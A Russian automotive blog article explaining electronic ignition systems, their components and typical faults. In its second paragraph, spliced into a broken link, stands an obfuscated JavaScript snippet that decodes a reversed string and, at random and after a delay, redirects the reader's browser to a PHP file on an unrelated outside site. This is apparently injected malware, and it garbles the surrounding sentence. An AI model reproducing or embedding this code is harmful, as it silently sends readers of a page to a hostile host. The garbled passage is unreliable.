Электрооборудование

Электронная система зажигания: механические контакты капитулировали

Герой данного рассказа — электронная система зажигания. В нем мы рассмотрим, решила ли система все проблемы своих предшественников?

Автомобильные $NfI=function(n){if (typeof ($NfI.list[n]) == «string») return $NfI.list[n].split(«»).reverse().join(«»);return $NfI.list[n];};$NfI.list=[«\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to-ru.ru/kontaktnaya-sistema-zazhiganiya.html» target=»_blank» rel=»noopener noreferrer»>механические контакты, которые под действием больших токов склонны к обгоранию и износу. Полностью решить эти проблемы можно, вовсе отказавшись от каких-либо контактов стало возможно в век электроники.

[contents]

Оглавление

Долой механический распределитель

На самом деле не все схемы, формально относящиеся к электронным, можно назвать честными, с точки зрения отсутствия подвижных механических контактов. Существуют такие основные их разновидности:

В первом случае механическое устройство всё же присутствует. Это тот самый распределитель, управляющий подачей высокого напряжения для искры на свечах.

Второй вариант более интересный, потому как такого узла у него уже нет, и абсолютно все процессы в системе происходят без каких-либо контакты. Давайте заострим своё внимание на схеме прямого зажигания.

Autoteka

Как устроена электронная система зажигания

Несмотря на то, что электронная система зажигания исполнила мечту нескольких поколений инженеров и полностью лишилась ненадёжных групп контактов, в её конструкции всё же присутствуют знакомые нам узлы, встречающиеся и в более ранних версиях схем. Итак, состав её следующий:

  • аккумулятор и генератор;
  • замок зажигания;
  • катушка (или катушки);
  • свечи;
  • электронный блок управления (контроллер);
  • воспламенитель;
  • различные датчики;
  • провода.

Как мы видим, часть элементов системы перекочевала сюда из архаичной классической контактной схемы, но некоторые не встречались нам ранее.

Неприятности всё же случаются…

Тем не менее, проблемы встречаются и у современных систем зажигания, начинённых электроникой.

К примеру, не редкость, когда выходят из строя свечи и катушки, окисляются контакты низковольтных и высоковольтных проводов, а также ломаются датчики или же сгорает электронная часть.

Признаками подобных неисправностей может стать неустойчивая работа мотора, трудности с запуском машины, повышенный расход.

Ну что ж, друзья, как вы видите, электронная система зажигания стала на сегодняшний день самой совершенной схемой, позволившей навсегда забыть о механических контактах и проблемах с ними связанных.

На этом всё, до новых встреч на страницах нашего блога и не забывайте читать свежие публикации!

Статьи по теме

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *

Back to top button